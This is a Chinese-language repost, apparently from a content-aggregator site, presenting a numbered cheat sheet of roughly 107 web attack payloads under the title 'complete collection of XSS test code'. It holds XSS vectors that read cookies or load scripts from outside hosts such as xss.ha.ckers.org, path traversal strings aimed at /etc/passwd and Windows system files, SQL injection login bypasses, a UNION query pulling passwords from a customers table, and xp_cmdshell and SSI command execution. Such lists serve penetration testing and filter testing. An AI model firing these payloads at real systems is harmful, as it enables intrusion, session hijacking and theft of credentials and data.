XSS跨站测试代码大全
Posted 很久很久以前
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了XSS跨站测试代码大全相关的知识,希望对你有一定的参考价值。
1 \'><script>alert(document.cookie)</script> 2 =\'><script>alert(document.cookie)</script> 3 <script>alert(document.cookie)</script> 4 <script>alert(vulnerable)</script> 5 %3Cscript%3Ealert(\'XSS\')%3C/script%3E 6 <script>alert(\'XSS\')</script> 7 <img src="javascript:alert(\'XSS\')"> 8 %0a%0a<script>alert(\\"Vulnerable\\")</script>.jsp 9 %22%3cscript%3ealert(%22xss%22)%3c/script%3e 10 %2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd 11 %2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini 12 %3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e 13 %3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e 14 %3cscript%3ealert(%22xss%22)%3c/script%3e/index.html 15 %3f.jsp 16 %3f.jsp 17 <script>alert(\'Vulnerable\');</script> 18 <script>alert(\'Vulnerable\')</script> 19 ?sql_debug=1 20 a%5c.aspx 21 a.jsp/<script>alert(\'Vulnerable\')</script> 22 a/ 23 a?<script>alert(\'Vulnerable\')</script> 24 "><script>alert(\'Vulnerable\')</script> 25 \';exec%20master..xp_cmdshell%20\'dir%20 c:%20>%20c:\\inetpub\\wwwroot\\?.txt\'--&& 26 %22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E 27 %3Cscript%3Ealert(document. domain);%3C/script%3E& 28 %3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID= 29 1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname= 30 http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/etc/passwd 31 ..\\..\\..\\..\\..\\..\\..\\..\\windows\\system.ini 32 \\..\\..\\..\\..\\..\\..\\..\\..\\windows\\system.ini 33 \'\';!--"<XSS>=&{()} 34 <IMG src="javascript:alert(\'XSS\');"> 35 <IMG src=javascript:alert(\'XSS\')> 36 <IMG src=JaVaScRiPt:alert(\'XSS\')> 37 <IMG src=JaVaScRiPt:alert("XSS")> 38 <IMG src=javascript:alert(\'XSS\')> 39 <IMG src=javascript:alert(\'XSS\')> 40 <IMG src=javascript:alert('XSS')> 41 <IMG src="jav ascript:alert(\'XSS\');"> 42 <IMG src="jav ascript:alert(\'XSS\');"> 43 <IMG src="jav ascript:alert(\'XSS\');"> 44 "<IMG src=java\\0script:alert(\\"XSS\\")>";\' > out 45 <IMG src=" javascript:alert(\'XSS\');"> 46 <SCRIPT>a=/XSS/alert(a.source)</SCRIPT> 47 <BODY BACKGROUND="javascript:alert(\'XSS\')"> 48 <BODY ONLOAD=alert(\'XSS\')> 49 <IMG DYNSRC="javascript:alert(\'XSS\')"> 50 <IMG LOWSRC="javascript:alert(\'XSS\')"> 51 <BGSOUND src="javascript:alert(\'XSS\');"> 52 <br size="&{alert(\'XSS\')}"> 53 <LAYER src="http://xss.ha.ckers.org/a.js"></layer> 54 <LINK REL="stylesheet" href="javascript:alert(\'XSS\');"> 55 <IMG src=\'vbscript:msgbox("XSS")\'> 56 <IMG src="mocha:[code]"> 57 <IMG src="livescript:[code]"> 58 <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(\'XSS\');"> 59 <IFRAME src=javascript:alert(\'XSS\')></IFRAME> 60 <FRAMESET><FRAME src=javascript:alert(\'XSS\')></FRAME></FRAMESET> 61 <TABLE BACKGROUND="javascript:alert(\'XSS\')"> 62 <DIV STYLE="background-image: url(javascript:alert(\'XSS\'))"> 63 <DIV STYLE="behaviour: url(\'http://www.how-to-hack.org/exploit.html\');"> 64 <DIV STYLE="width: expression(alert(\'XSS\'));"> 65 <STYLE>@im\\port\'\\ja\\vasc\\ript:alert("XSS")\';</STYLE> 66 <IMG STYLE=\'xss:expre\\ssion(alert("XSS"))\'> 67 <STYLE TYPE="text/javascript">alert(\'XSS\');</STYLE> 68 <STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert(\'XSS\')");}</STYLE><A class="XSS"></A> 69 <STYLE type="text/css">BODY{background:url("javascript:alert(\'XSS\')")}</STYLE> 70 <BASE href="javascript:alert(\'XSS\');//"> 71 getURL("javascript:alert(\'XSS\')") 72 a="get";b="URL";c="javascript:";d="alert(\'XSS\');";eval(a+b+c+d); 73 <XML src="javascript:alert(\'XSS\');"> 74 "> <BODY ONLOAD="a();"><SCRIPT>function a(){alert(\'XSS\');}</SCRIPT><" 75 <SCRIPT src="http://xss.ha.ckers.org/xss.jpg"></SCRIPT> 76 <IMG src="javascript:alert(\'XSS\')" 77 <!--#exec cmd="/bin/echo \'<SCRIPT SRC\'"--><!--#exec cmd="/bin/echo \'=http://xss.ha.ckers.org/a.js></SCRIPT>\'"--> 78 <IMG src="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"> 79 <SCRIPT a=">" src="http://xss.ha.ckers.org/a.js"></SCRIPT> 80 <SCRIPT =">" src="http://xss.ha.ckers.org/a.js"></SCRIPT> 81 <SCRIPT a=">" \'\' src="http://xss.ha.ckers.org/a.js"></SCRIPT> 82 <SCRIPT "a=\'>\'" src="http://xss.ha.ckers.org/a.js"></SCRIPT> 83 <SCRIPT>document.write("<SCRI");</SCRIPT>PT src="http://xss.ha.ckers.org/a.js"></SCRIPT> 84 <A href=http://www.gohttp://www.google.com/ogle.com/>link</A> 85 admin\'-- 86 \' or 0=0 -- 87 " or 0=0 -- 88 or 0=0 -- 89 \' or 0=0 # 90 " or 0=0 # 91 or 0=0 # 92 \' or \'x\'=\'x 93 " or "x"="x 94 \') or (\'x\'=\'x 95 \' or 1=1-- 96 " or 1=1-- 97 or 1=1-- 98 \' or a=a-- 99 " or "a"="a 100 \') or (\'a\'=\'a 101 ") or ("a"="a 102 hi" or "a"="a 103 hi" or 1=1 -- 104 hi\' or 1=1 -- 105 hi\' or \'a\'=\'a 106 hi\') or (\'a\'=\'a 107 hi") or ("a"="a[/code]
以上是关于XSS跨站测试代码大全的主要内容,如果未能解决你的问题,请参考以下文章